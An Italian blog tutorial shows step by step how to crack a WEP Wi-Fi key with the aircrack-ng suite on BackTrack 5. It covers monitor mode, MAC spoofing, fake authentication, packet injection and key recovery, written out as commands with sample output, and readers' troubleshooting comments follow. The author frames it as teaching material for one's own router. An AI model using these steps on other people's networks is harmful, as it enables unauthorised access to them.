Posted by & filed under Hacking, Linux, Sicurezza informatica.

DMCA.com

Dopo un primo tutorial su come crackare una rete wifi con protezione wep su mac osx con kismac oggi vi farò vedere come ottenere un risultato equivalente usando aircrack-ng.

Attenzione

Crackare, o tentare di farlo, una rete wifi altrui (non propria) è illegale e punibile legalmente. Non fate esperimenti su reti di terzi perchè è illegale ed è vietato farlo.

Questo tutorial vuole avere solo uno scopio informativo, didattico.

Non assecondiamo in nessun modo chi vuole compiere atti di pirateria informatica.

L’etica hacker è una cosa molto importante e MAI nessuno hacker oserebbe sfruttare le proprie conoscenze per arrecare danni a terzi. Ci tengo a sottolineare questa cosa perchè c’è una bella differenza tra hacker, cracker e lamer. Ma questa è un’altra storia..


Requisiti

  • Avere una distribuzione linux funzionante. Io consiglio backtrack 5 (gratis). Potete anche installarla, come ho fatto io, in una macchina virtuale creata con parallels (a pagamento), fusion (a pagamento) o virtual box(gratis).
  • Avere un chiavetta wifi supportata se volete velocizzare il cracking con l’injection. La chiavetta consigliata è l’Alfa AWUS036H(30€ su ebay)
  • Avere un router/modem WIFI su cui possiamo eseguire il test (farlo su un router/modem altrui è illegale) e impostare su di esso una password con cifratura WEP.

Cose da fare

Prima di seguire il tutorial assicuratevi di aver ben chiaro ogni cosa che andremo a fare. Copiare e incollare i comandi non ha nessuna utilità e il rischio che voi vi blocchiate in qualche passaggio è molto alto. Al contrario se vi sforzate un minimo per capire il percorso che andremo a fare tutto sarà molto più semplice.

Ecco i tre punti più importanti che andremo ad eseguire:

  1. Setup delle periferiche e delle interfacce di rete
  2. Collezione dei pacchetti
  3. Crack della chiave mediante i pacchetti catturati

1) Setup delle periferiche e delle interfacce di rete

La prima cosa da fare, ovviamente, è avviare la nostra macchina virtuale e far partire la distribuzione linux scelta per eseguire il test.

Io eseguirò il test con parallels, la chiavetta ALFA AWUS036H  e backtrack 5. Consiglio sempre l’utilizzo di backtrack 5 in quanto esso ha già installato la suite aircrack-ng e ha i driver già patchati per la maggiorparte delle chiavette wifi nate per il wardriving.

Se non usate baktrack 5 ma usate un’altra distro (esempio ubuntu) dovrete patchare i driver della vostra chiavetta e installare aircrack-ng.

In questo caso, se usate una distro diversa da backtrack, per installare aircrack-ng basterà dare nel terminale il comando:

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install aircrack-ng

Mentre per patchare i driver della vostra chiavetta usb WIFI vi rimando al sito aircrack-ng.org/ dove troverete numerosi tutorial.

Inoltre, se usate una distro diversa da backtrack prima di ogni comando che troverete in questa guida dovete scrivere “sudo”.

Il mio consiglio, per evitare sbattimenti vari, è quello di usare backtrack 5.

Ok ora è il momento di iniziare a fare sul serio.

Dobbiamo per prima cosa controllare se la nostra chiavetta usb è stata riconosciuta dal sistema e con che nome essa è stata riconosciuta. Per fare ciò diamo nel terminale il comando:

airmon-ng

Il sistema risponderà qualcosa del genere:

Interface    Chipset        Driver

wlan0        Realtek RTL8187L    rtl8187 - [phy2]

Come potete notare il sistema ha riconosciuto la mia chiavetta e l’ha “chiamata” wlan0. D’ora in avanti, in tutto il codice che scriverò, al posto di wlan0 dovrete sostituire il nome della vostra interfaccia che, per forza di cose, POTREBBE chiamarsi in modo diverso.

Per fare in modo che la nostra chiavetta wifi possa cercare le reti wifi in zona dobbiamo metterla in monitor mode.

Per mettere la nostra chiavetta in monitor mode basta dare il comando:

airmon-ng start wlan0

Il sistema vi risponderà:

airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
714    dhclient3
4601    dhclient
4983    dhclient3
5225    dhclient
5243    dhclient
Process with PID 4983 (dhclient3) is running on interface wlan0

Interface    Chipset        Driver

wlan0        Realtek RTL8187L    rtl8187 - [phy2]
(monitor mode enabled on mon0)

Il computer creerà ora una nuova interfaccia virtuale, a partire da wlan0, e la metterà in monitor mode. Trovate il nome della vostra nuova interfaccia nella stringa di risposta:

(monitor mode enabled on mon0)

Potete vedere che nel mio caso si chiama mon0. D’ora in avanti, in tutto il codice, dove vedrete mon0 dovrete mettere il nome della vostra interfaccia virtuale.

Possiamo ora eseguire una prima scansione delle reti per trovare la rete bersaglio che andremo a crackare. Date il comando:

airodump-ng --encrypt wep mon0
  • airodump-ng è semplicemente il nome dello script
  • --encrypt wep è un filtro per cercare solo le reti con cifratura wep
  • mon0 è il nome della nostra interfaccia virtuale

Il terminale a questo punto vi mostrerà una schermata SIMILE a questa:

CH  5 ][ BAT: 2 hours 2 mins ][ Elapsed: 8 s ][ 2011-05-17 11:00

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:1C:A2:1B:47:A9  -62        9        0    0   1  54   WEP  WEP         Alice-09325166
02:24:01:4B:36:88  -67        8        0    0   1  54e  WEP  WEP         Wifi JR

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Aspettate qualche secondo fino a quando non vedrete la vostra rete e poi, per fermare la scansione, premente CTRL + C.

Prendete nota del BSSID, che sarebbe il MAC Adress, dell’Access Point (AP da ora in avanti) vittima e del canale sotto cui opera (lo trovate sotto la colonna CH).

Ora che sappiamo il canale su cui opera il nostro AP vittima, ad esempio il canale 1, dobbiamo distruggere l’interfaccia virtuale prima creata (mon0 nel nostro caso) e ricrearla specificando su che canale impostare la monitor mode.

Questo è un passaggio che molti sottovalutano ma che è di grande importanza. Se mettiamo la nostra chiavetta in monitor mode senza specificare il canale avremo una ricezione non stabile che, spessissimo, è causa del mancato cracking di una chiave wep.

Distruggiamo l’interfaccia virtuale con il comando:

airmon-ng stop mon0
  • airmon-ng è lo script usato
  • stop è il comando per distruggere l’interfaccia virtuale

Il computer vi darà conferma del tutto con qualcosa di simile:

airmon-ng stop wlan0

Interface    Chipset        Driver

wlan0        Realtek RTL8187L    rtl8187 - [phy2]
(monitor mode disabled)
mon0        Realtek RTL8187L    rtl8187 - [phy2]

A questo punto non ci resta che rimettere in monitor mode wlan0 specificando questa volta il canale che ci serve (in questo esempio 1):

airmon-ng start wlan0 1

Notate l’uno (1) alla fine della stringa che indica il canale su cui operare.

Il sistema vi notificherà il tutto con qualcosa di simile:

airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
714    dhclient3
4601    dhclient
4983    dhclient3
5225    dhclient
5243    dhclient
Process with PID 4983 (dhclient3) is running on interface wlan0

Interface    Chipset        Driver

wlan0        Realtek RTL8187L    rtl8187 - [phy2]
(monitor mode enabled on mon0)

A questo punto la nostra interfaccia di rete(mon0) è quasi pronta.

Per una maggiore sicurezza è preferibile cambiare il MAC adress della propria scheda con uno fittizio. Siccome stiamo cercando di violare il NOSTRO AP non abbiamo bisogno di questo comando. Ma a scopo didattico vi illustrerò il suo funzionamento.

Per cambiare il MAC adress della nostra scheda dovremo:

  1. Stoppare la nostra interfaccia
  2. Cambiare il mac adress usando macchanger
  3. Riattivare l’interfaccia

Per stoppare l’interfaccia basta dare nel terminale

ifconfig mon0 down

Per cambiare il MAC adress invece basta dare il comando:

macchanger -a mon0
  • macchanger è il nome dello script che cambia il mac adress
  • -a significa assegna un mac adress casuale
  • mon0 è il nome della scheda a cui vogliamo cambiare l’indirizzo mac

Infine per riattivare l’interfaccia precedentemente sospesa usiamo il comando:

ifconfig mon0 up

A questo punto finalmente abbiamo completato la preparazione: abbiamo l’interfaccia virtuale in monitor mode e sul canale corretto e abbiamo cambiato il suo mac adress per sicurezza.

2) Collezione dei pacchetti

Siamo ora in grado di iniziare a collezzionare i pacchetti di dati necessari a trovare la password della nostra rete wifi.

Per iniziare a registrare tutti pacchetti diamo nel terminale il comando:

airodump-ng --bssid 00:1C:A2:1B:47:A9 -c 1 -w test-mauromarano.it mon0
  • airodump-ng è il nome dello script per cattarare e salvare i pacchetti
  • –bssid serve per scansionare solo la rete che serve a noi. Dobbiamo mettere subito dopo –bssid il bssid (mac adress) dell’AP vittima. Quello che avete segnato prima.
  • -c serve per specificare il canale su cui fare la ricerca.
  • -w serve per salvare tutti i dati in un file chiamato con il nome che segue a questa istruzione. Nel nostro caso il file si chiamerà test.mauromarano.it
  • mon0 come sempre indica l’interfaccia da utilizzare

Il sistema vi mostrerà una schermata simile a questa:

CH  5 ][ BAT: 2 hours 2 mins ][ Elapsed: 8 s ][ 2011-05-17 11:00

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:1C:A2:1B:47:A9  -62        9        0    0   1  54   WEP  WEP         Alice-09325166

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Per trovare una password con cifratura wep abbiamo bisogno di catturare un certo numero di pacchetti chiamati IVs. Questi pacchetti, nella schermata di airodump-ng , vengono mostrati sotto la colonna #Data.

Non esiste un numero fisso di pacchetti necessari per trovare la chiave della rete. Possono volerci 20,000 IVs o anche oltre 1,000,000 (un milione) di IVs.

A questo punto possiamo fare due cose:

  1. Attendere passivamente che il numero di pacchetti aumenti.
  2. Velocizzare attivamente la generazione e la cattura di questi pacchetti.

Possiamo scegliere l’opzione 2 solo se abbiamo una chiaveta che supporta l’injection. Se non l’abbiamo non ci resta che armarci di pazienza ed attendere in maniera passiva.

Sappiate che se scegliete l’opzione 1 (per necessità o scelta) la velocità con cui catturerete i pacchetti dipenderà dal grado di attività della rete. Mi spiego meglio: se ci sono 10 computer collegati alla nostra rete bersaglio essi genereranno una grande quantità di dati e cosi anche di pacchetti. Se al contrario non c’è nessun computer collegato alla rete bersaglio non catturerete quasi nessun pacchetto.

Ammettiamo di scegliere l’opzione 2. Per velocizzare la cattura dei pacchetti dovremo:

  1. Far credere all’AP bersaglio di essere dei client autenticati.
  2. Catturare un pacchetto e iniettarlo verso l’AP per stimolare la generazione di ulteriori pacchetti.

Per far credere all’AP di essere un client già autenticato dovremo sferrare un attacco chiamato fake authentication. Per farlo apriamo una nuova finestra del terminale(lasciando aperta quella di airodump e senza toccarla più) e diamo il comando:

aireplay-ng -1 0 -a 00:1C:A2:1B:47:A9 mon0
  • aireplay-ng è lo script per eseguire l’attacco
  • -1 0 è il tipo di attacco (fake authentication)
  • -a indica l’indirizzo MAC dell’AP bersaglio
  • mon0 indica l’interfaccia da usare

Il sisema vi notificherà del successo con qualcosa di simile:

aireplay-ng -1 0 -a 00:1C:A2:1B:47:A9 mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:4F:8D:2B)
11:43:52  Waiting for beacon frame (BSSID: 00:1C:A2:1B:47:A9) on channel 1

11:43:52  Sending Authentication Request (Open System) [ACK]
11:43:52  Authentication successful
11:43:52  Sending Association Request [ACK]
11:43:52  Association successful :-) (AID: 1)

Notate che nell’ultima riga ci conferma che l’attacco è riuscito. Se non dovesse riuscire, provate quest’altro comando (solo se non funziona il primo attacco):

aireplay-ng -1 6000 -o 1 -q 10 -a 00:1C:A2:1B:47:A9 mon0
  • -1 6000 -o 1 -q 10 sono delle opzioni per gli AP più complicati.

Notate che nella finestra di airodump comparirà nella zona inferire il MAC adress della vostra interfaccia virtuale. Questo perchè ora l’AP crede che noi siamo collegati ad esso.

Ora che l’AP crede che noi siamo autenticati possiamo sferrare l’attacco vero e proprio per generare tanti IVs che ci serviranno, come spero che abbiate capito, per crackare in seguito la chiave.

Ci sono diversi tipi di attacchi per forzare l’AP a generare IVs.

Per vedere tutti i tipi di attacchi disponibili date nel terminale (nella seconda finestra aperta, quella appena aperta per la falsa autenticazione) il comando:

aireplay-ng

Vi verrà fuori tutta la lista degli attacchi possibili:

Attack modes (numbers can still be used):

--deauth      count : deauthenticate 1 or all stations (-0)
--fakeauth    delay : fake authentication with AP (-1)
--interactive       : interactive frame selection (-2)
--arpreplay         : standard ARP-request replay (-3)
--chopchop          : decrypt/chopchop WEP packet (-4)
--fragment          : generates valid keystream   (-5)
--caffe-latte       : query a client for new IVs  (-6)
--cfrag             : fragments against a client  (-7)
--migmode           : attacks WPA migration mode  (-8)
--test              : tests injection and quality (-9)

--help              : Displays this usage screen

In questo primo esempio useremo l’attacco numero 2 chiamato interactive. Questo è l’attacco più semplice da utilizzare e spesso il più efficace.

Potrebbe però non essere sempre efficace e generare nuovi IVs. Se ciò dovesse accadere dovete provare un attacco differente.

Più avanti spiegherò in dettaglio anche i diversi dipi di attacco. Per ora concentriamoci sull’attacco numero 2.

Per sferrare questo tipo di attacco date nel terminale il codice:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1C:A2:1B:47:A9 mon0
  • aireplay-ng è lo script da usare per sferrare l’attacco.
  • -2 -p 0841 -c FF:FF:FF:FF:FF:FF è il tipo di attacco e alcune opzioni relativo ad esso. Non preoccupatevi di questo e copiatelo per intero.
  • -b indica il bssid dell’AP bersaglio
  • mon0 l’interfaccia da usare

Il computer inizierà ad analizzare i pacchetti catturati e ad un certo punto vi farà una domanda:

Use this packet ?

Voi scrivete y e date invio.

Il sistema vi risponderà:

Saving chosen packet in replay_src-0517-234409.cap
You should also start airodump-ng to capture replies.

16948 packets...(500 pps)

E inizierà a iniettare i pacchetti verso l’AP per stimolarlo a generare nuovi IVs.

A questo punto tornate nella finestra di airodump e noterete che i pacchetti mostrati sotto la colonna #Data stanno aumentando  vertiginosamente.

Come detto prima potrebbe anche non succedere nulla. Se non succede nulla allora dovete provare con un altro attacco. Potete provare da soli, cercare su google o aspettare che io aggiorni la guida.

Ammettiamo che tutto stia andando bene e andiamo avanti.

Dovreste ritrovarvi ora con 2 finestre aperte:

  1. La prima con airodump-ng a collzionare i pacchetti
  2. La seconda con aireplay-ng a generare IVs

Apriamo una terza ed ultima finestra del terminale e prepariamoci al crack della chiave.

3) Crack della chiave mediante i pacchetti catturati

In quest’ultima fase andremo ad utilizzare tutti i pacchetti catturati fino ad ora per crackare la chiave WEP.

Precedentemente abbiamo lanciato airodump-ng, che dovrebbe ancora essere in esecuzione nella prima finestra del terminale, che sta salvando tutti i pacchetti che cattura in un file. Il file che contiene tutti i pacchetti è nella root del vostro account. Per individuarlo, se usate backtrack 5 e gnome come desktop manager, andate in place > home folder. A questo punto dovreste individuare un file con estensione .cap e con nome quello che abbiamo scelto all’avvio di airodump (il parametro dopo il -w ).

Il prossimo ed ultimo step da fare è quello di avviare aircrack-ng per trovare la chiave della rete. Sappiate che aircrack-ng farà un primo tentativo di cracking al primo avvio e poi tenterà di trovare la chiave ogni 5000 IVs catturati.

Il comando per avviare il cracking della chiave è veramente semplicissimo:

aircrack-ng nome-del-file-che-contiene-i-pacchetti.cap
  • aircrack-ng è semplicemente il nome del programma.
  • Subito dopo il nome del programma va messo il nome del file che contiene i nostri dati. Potete scrivere il nome intero a mano oppure prendere il file e trascinarlo nella finestra del terminale. Cosi facendo il sistema copierà automaticamente il nome del file e il suo percorso.

Da notare che il file che contiene i nostri dati, rispetto al nome che gli assegnamo all’avio di airodumo-ng, ha un nome leggermento diverso. Se noi lo chiamiamo all’avvio di airodump pippo, il file verrà chiamato pippo-01.cap . Quindi airodump aggiunge sempre il suffisso -0x.cap ai nostri file.

Dopo aver avviato aircrack-ng il computer ci mostrerà a schermo un risultato simile a questo:

aircrack-ng test-01.cap
Opening test-01.cap
Read 599695 packets.

#  BSSID              ESSID                     Encryption

1  xx:xx:xx:xx:xx:xx  Test                   WEP (106866 IVs)

Choosing first network as target.

Opening test-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 106866 ivs.

Aircrack-ng 1.1

[00:00:00] Tested 577 keys (got 106760 IVs)

KB    depth   byte(vote)
0    3/  4   BA(118272) 91(116736) BC(116480) F3(116224) A9(115968)
1   17/  1   EE(114432) 04(114176) 7E(114176) B4(113920) 22(113920)
2    0/  2   94(153344) 63(123392) 8C(120320) 0C(117504) E3(116736)
3    2/  3   C4(116992) 06(116480) 8F(116480) 15(115712) 58(115712)
4    3/  7   73(119808) 96(119552) D6(117248) 80(117248) B3(116992)

KEY FOUND! [ xx:xx:xx:xx:xx:xx:xx:xx ] (ASCII: yyyyyyyyyyyyyy )
Decrypted correctly: 100%

Come spiegato prima non esiste un numero preciso di pacchetti da catturare. Questo è un fattore che varia da rete a rete.

Come potete vedere dal risultato postato sopra aircrack-ng inizierà il cracking e farà un nuovo tentativo ogni 5000 IVs catturati. Dopo un po’ di tempo vi darà finalmente la conferma che la password è stata trovata!

Aircrack-ng vi darà sia la password hex che la versione ASCII della stessa. Se non sapete cosa vuol dire sappiate che la password testuale che mettete voi per un qualunque sito è sempre una password ASCII. Per appronfodire l’argomento fate una ricerca su google. Troverete migliaia di guide che vi spiegano la differenza tra HEX e ASCII.

Conclusioni

Come già specificato tante volte durante questo lungo tutorial ci tengo a sottolineare che il tipo di attacco preso a titolo d’esempio in questa guida per generare IVs potrebbe non funzionare. Ci sono tantissimi tipi di attacchi e solitamente prima di crackare una rete WEP bisogna fare svariati tentativi fino a trovare quello più congeniale all’AP che stiamo attaccando.

Ribadisco infine il concetto già espresso sopra:

Crackare, o tentare di farlo, una rete wifi altrui (non propria) è illegale e punibile legalmente. Non fate esperimenti su reti di terzi perchè è illegale ed è vietato farlo.

Questo tutorial vuole avere solo uno scopio informativo, didattico.

Non assecondiamo in nessun modo chi vuole compiere atti di pirateria informatica.

Il video

Ho messo il video alla fine del tutorial volutamente.

Vorrei che tutti voi faceste lo sforzo di leggere prima tutto il tutorial testuale.

So che è lungo, ma spero che vi chiarisca le idee su come funziona aircrack e sul modo d’operare quando si ha la necessità di ritrovare la propria password wep smarrita.

  • oscurodrago

    alla faccia del creker saiva :D ammazza se ti cis tai impegnando :D

  • http://mauromarano.it Mauro

    Eh si, più dettagliata di questa guida non si poteva fare :D

  • Edofumi

    Quale versione di backtrack 5 hai installato sul tuo Mac? Ho visto che ce ne sono diverse da scaricare? Ciao e grazie

  • http://mauromarano.it Mauro

    Se hai un computer a 64 bit scegli la versione a 64 bit.
    Poi devi scegliere che ambiente desktop usare tra gnome e kde 4. Per interdeci a seconda del desktop manager che scegli avrai un interfaccia grafica del sistema diversa. Cambia solo l’interfaccia le funzioni e il core della distro rimangono immutate. Sostanzialmente diciamo che gnome è più semplice e veloce come interfaccia. KDE invece è più bella ma anche più pesante.
    Io uso gnome perchè preferisco un’interfaccia più leggera. In ogni caso puoi scegliere quella che vuoi, per il tutorial non cambia nulla.
    Poi scegli di scaricare la distro tramite torrent perchè è molto ma molto più veloce ;)

  • francesco

    ciao complimenti per la guida =) vorrei sapere quando avvio backtrack ci sono delle vari opzioni,quale devo selezionare? io di solito usavo no network connection xò non mi fa accedere a internet..

  • Angelo

    Grande Mauro. ;) Adoro questi programmini. Una volta ho provato con Backtrack a crackare la mia WPA, poiché l’avevo smarrita e non volevo resettare la mia ADSL con le impostazioni sistemate. :) Purtroppo non ci sono riuscito, e alla fine ho resettato. :(

  • http://mauromarano.it Mauro

    @francesco
    Scegli la prima opzione :D

    @Angelo
    E’ in cantiere un video sulle password WPA. Però se la password è buona, cioè scelta casualmente con numeri e lettere è incrackabile. Le password WPA sono crackabili solo se sono nomi di cosa/persone/animali ecc. :D

  • Domenico

    Ciao ragazzi, questa guida e’ fantastica! solo che le mie conoscenze in materia sono davvero base. infatti gia’ all’inizio incappo in un problema. In pratica quando eseguo il primo comando (airmon-ng), parte il l’operazione di riconoscimento ma non mi trova nulla. i 3 campi (interface, chipset e driver). Suppongo che il sistema non mi riconosca la scheda, ma la cosa e’ molto strana, dato il fatto che la scheda la uso per connettermi e va piu’ che bene. C’e’ qualcosa che mi sfugge :D qualcuno sa aiutarmi, anche consigliandomi una guida? grazie mille a presto

  • http://mauromarano.it Mauro

    @Domenico
    Ciao Domenico,
    ci sono cosi tanti computer diversi al mondo (con tante schede di rete diverse) che fare una guida per ogni scheda era impossibile :D
    Anzi tutto dovresti precisare se utilizzi backtrack 5 nativamente oppure in una macchina virtuale.
    Poi ti consiglio di leggere questa ottima documentazione (in inglese) disponibile sul wiki del sito ufficiale: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=b5c6100e426c39f580e88e1005f7f2a1

  • Angelo

    @Mauro:
    La mia è scelta a caso dal router, quindi non c’è modo di trovarla, se ho ben capito.

  • http://mauromarano.it Mauro

    Se è scelta a caso dal router ed è formata da un numero sufficentemente elevato di caratteri casuali, possibilmente maiuscoli, minuscoli, lettere, numeri e simboli allora non hai nulla da preoccuparti :D

  • davide

    Ciao Mauro!! Grande guida..funziona tutto alla perfezione, complimenti! Volevo chiederti, ho testato questa guida su Backtrack5 e tutto è andato alla perfezione, ma sempre con backtrack5 fatto girare in virtuale su virtualbox al comando airmon-ng non mi compare nessuna interfaccia, chipset e driver, insomma i campi rimangono vuoti. hai qualche consiglio su come posso fare riconoscere il mio pendrive wifi usb (ne ho diversi) in backtrack5 virtualizzato con virtual box?
    e poi volevo chiederti…hai un progetto una guida sul crack WPA..magari sempre con BT5?

  • Riccardo

    Ciao… Sn riuscito a trovare la chiave,ma nn capisco a cosa corrisponde! A3:9B:C6:ED:69

  • edofumi

    se digitando airmon-ng non riconosce l usb wifi (che e’ il tuo stesso wifi alfa)?

  • edofumi

    Ci sono riuscito :)

  • http://mauromarano.it Mauro

    @davide
    Ho in progetto una guida per le password WPA ed è già in lavorazione ;) Per quanto riguarda la tua pennetta WIFI non ti posso dare direttamente una mano perchè ci sono mille pennette e hardware diversi..ti consiglio di leggerti per bene questo articolo http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=f1f29a301260be07d4e2c98d60b20ad3 che sono sicuro ti aiuterà ;)

    @Riccardo
    La password è quella! Basta che elimini i “:” ogni due caratteri :D

    @edofumi
    Sono contento che hai risolto pure tu :D

  • Ivan

    ciao, ho scaricato backtrack5 e lo faccio girare su virtualbox, ho un portatile HP 4GB RAM, Win 7, con scheda di rete : “Atheros communication AR9285 wireless network adapter (PCIe)”.Come ho letto dalla guida non dovrei avere bisogno di installare i driver xkè backtrack5 già ce li ha.
    Però non riesco a capire xkè quando dal terminale invio il comando airmon-ng non mi trova nessuna scheda di rete.
    Nel caso dovessi scaricare i driver dovrei poi installarli da backtrack5 o da windows 7?
    Vi prego aiutatemi.
    grazie

  • Diegos

    ciao a tutti, innanzi tutto complimenti per la guida è eccellente!!
    anche io ho lo stesso problema di Ivan e anche la stessa scheda di rete “AR9285″.
    Non essendo riuscito a trovare i driver ho provato a scaricare compat-wireless-2.6.39-1,ho seguito tutta la procedura ma una volta che vado per installare mi da questo errore :
    [email protected]:~/Desktop#
    tar -xf /Desktop/compat-wireless-2.6.39-1.tar.bz2
    tar: /Desktop/compat-wireless-2.6.39-1.tar.bz2: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    [email protected]:~/Desktop#.
    Ho cercato per un intero giorno sul sito che avete postato nei post precedenti ma niente, ho fatto decine di domande in giro per i forum italiani e non e ancora niente.non so più che fare per questo problema.aiutatemi

  • http://mauromarano.it Mauro

    @Ivan
    Backtrack contiene già i driver per le schede di rete più comuni, specie quelle usb. Per installare i driver della tua scheda di rete devi leggere qua http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=f1f29a301260be07d4e2c98d60b20ad3 . Sappi che il wardriving si fa sempre con una pennetta WIFI perchè rende le cose molto più semplici!

    @Diegos
    Mi fa piacere che prima di postare hai letto quello che c’era da leggere. L’errore che ti da il terminale è abbastanza chiaro. Prova ad estrarre l’archivio sul tuo OS principale (che sia mac o win), poi copialo di nuovo su backtrack (puoi fare queste operazioni di copia con una pennetta usb) e installa i driver seguendo la guida che stavi seguendo ;)

  • Diegos

    Niente da fare ho dovuto rinunciare al dual boot con win 7 e a virtualbox, ho risolto copiando il file ISO su un DVD e avviandolo da boot.
    La cosa + bella è che non ho dovuto nemmeno cercare i driver xkè digitando dal terminale:
    airmon-ng è uscito wlan0 e il ath9k come driver preinstallato.
    Ho un solo ultimo problema su backtrack5, Mauro, pur riconoscendo i suddetti driver e i comandi di aircrak-ng, non riesco più a navigare col browser firefox, mentre prima con virtualbox ci riuscivo.
    Dammi solo qualche input riguardo il motivo da cui potrebbe dipendere poi magari le ricerche me le faccio io.
    Comunque grazie mille e di nuovo complimenti per la guida, intanto che impariamo tutti i possibili attacchi con aircrack aspettiamo con ansia la guida sulle WAP keys :)

  • http://mauromarano.it Mauro

    @Diegos
    Ok quindi fai partire backtrack 5 direttamente dal DVD, benissimo. Ma prima di provare a navigare con firefox ti sei collegato alla tua rete?

  • Diegos

    Mauro volevo chiederti un ulteriore e spero ultimo chiarimento.A questo punto del tutorial dopo aver scelto il canale 1 con il comando

    airmon-ng start wlan0 1

    “Ci troviamo questa schermata”

    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    PID Name
    714 dhclient3
    4601 dhclient
    4983 dhclient3
    5225 dhclient
    5243 dhclient
    Process with PID 4983 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan0 Realtek RTL8187L rtl8187 – [phy2]
    (monitor mode enabled on mon0)

    Ecco proprio in quest’ultima riga a te da “mon0″ anche nel videotutorial invece a me da “(monitor mode enabled on mon1)”praticamente cambia il numero da 0 a 1.Devo quindi continuare ad usare “mon0″ nei comandi del terminale o devo cambiare in “mon1″?
    grazie

  • Diegos

    @Mauro
    ora posso scegliere di far partire o win 7 o backtrack 5.
    su win 7 la connessione è ottima e naviga benissimo, su backtrack vado su applications>internet>FireFox Web Browser, mi da la prima pagina di backtrack ma se provo a cambiare sito mi dice : Server not found.Firefox can’t find the server etc etc..
    Prima quando avevo backtrack su virtualbox in dual boot con win 7 riuscivo a navigare con firefox

  • Diegos

    ah tu intendi dire che c’è un comando da dare su backtrack che ti permette di connetterti alla rete??
    Se è così no non ho dato nessun comando.cosa devo fare?
    grazie
    @Mauro

  • Diegos

    Ivan a te volevo dirti che la nostra scheda ha la packet injection integrata su backtrack 5 ti conviene trovare i driver o fare col DVD come ho fatto io.buona fortuna@Ivan

  • http://mauromarano.it Mauro

    @Diegos
    Come hai detto anche tu devi prima collegarti al tuo network se vuoi navigare su internet :D
    Per fare una scansione delle reti e collegarti al tuo network vai nel menù delle applicazioni>internet>wicd
    Guarda questo screensthot: https://img.skitch.com/20110528-jqbcd2ypmjn84k1iwbeb29udw.jpg

  • Diegos

    ok Mauro è andata devi togliermi solo l’ultima curiosità perchè sto impazzendo.nella schermata di aerodump quella dove stiamo collezionando pacchetti sotto la dicitura ENC della mia rete “vittima” c’e’ scritto WPA e sotto CIPHER c’e’ scritto WEP.Quindi :
    ENC – WPA
    CIPHER – WEP.
    Ti faccio questa domanda perchè ieri i numeri sotto “#Data” erano arrivati a oltre 3.500.000 e aircrack non era ancora riuscito a trovare la chiave.E’ possibile che non la trovi per via di quel WAP strano sotto ENC?
    ti giuro se mi risolvi questa non ti rompo più:))
    grazie

  • http://mauromarano.it Mauro

    @Diegos
    Fai una cosa per essere sicuro, avvia airodump-ng con questo comando (dopo aver abilitato la monitor mode sulla tua interfaccia virtuale): airodump-ng –encrypt wep mon0 .
    Cosi dovrebbe mostrarti solo le reti con cifratura wep. Perchè da quello che ho capito la rete che stai tentando di attaccare è una rete WPA e non WEP!
    Magari fammi anche uno screenshot!

  • luigi

    @Mauro
    Non capisco perchè a menu il menu in alto per aprire una nuova finestra non compare, eppure ho usato parallels desktop, backtrack 5 versione 64 con interfaccia gnome. Qualcuno mi aiuta? Grazie.

  • Diegos

    @Mauro
    Innanzi tutto grazie per l’aiuto e l’immensa disponibilità, 6 un grande!!
    Inizio col dirti che la chiave che sto tentando di craccare ormai da 3 giorni è una chiave WEP,
    ho seguito passo passo il tuo tutorial sia sul sito che su youtube e riesce tutto alla perfezione: dal “monitor mode” della scheda ,passando per la “fake authentication” fino alla packet injection con aireplay, i numeri sotto #Data(che dovrebbero essere gli IVs, giusto?),infatti iniziano a salire vertiginosamente ma quando arrivo al crack della chiave con aircrak niente di fatto.Inoltre ho notato che l’attacco fragment e chopchop non sono altro che modi diversi di fare packet injection con aireplay(dimmi se sbaglio su questa affermazione), infatti provandoli sono arrivato allo stesso risultato : numeri in salita vertiginosa ma niente chiave.
    C’e’ un qualche modo alternativo e magari anche estremo per trovare questa maled. chiave?? aiutami
    grazie :)

  • http://mauromarano.it Mauro

    @luigi
    Semplicemente vai in accessori>terminale e cliccandoci sopra aprirai una nuova finestra del terminale ;)

    @Diegos
    Si, i numeri sotto #Data sono gli IVs.
    Si, sia il metodo fragment che chopchop sono delle vie alternative per generare IVs. Qualsiasi attacco tu decida di fare per crackare una chiave wep devi sempre collezzionare tanti IVs.

    Prova a mandarmi il file .cap cosi faccio qualche prova ;) Mandami una email tramite la pagina dei contatti che ti dico come agire!

  • http://xxxxx helen

    Ciao Mauro ieri ho provato (con una wap) e,nonolstante abbia tenuto tutto la notte il pc acceso nulla,in effetti avendop fatto + di un tentativo mi sono scordata la seocnda volta di dare il comando di salvare il tutto nel file cap.Uso backtrack 4 la 5 in live boot mi da un errore sullo schermo non so perchè.Ad ogni modo penso di aver capito cosa ho sbagliato nel primo passaggio cioè dopo aver creato il collegamento con la “macchina remota” devo subito dopo dare il comando per i pacchetti la prima volta invece avevo perso tempo a leggere il tuo tutorial :)
    Solo una cosa non è come hai scritto e non so perchè ti spiego…
    Dopo aver dato il comando
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1C:A2:1B:47:A9 mon0
    dici che ci sta “Use this packet ?”una richiesta a cui rispondere con Y …Io non ho questa richiesta parte subito la lettura dei pacchetti (vado a memoruia anzi mi sembra che ne genear di pacchetti) è normale?
    Ciao
    Helen

  • Diegos

    @Mauro
    Finalmente dopo 4 giorni di prove e attacchi falliti ankio posso dire : KEY FOUND!
    Grazie mille Mauro!!!

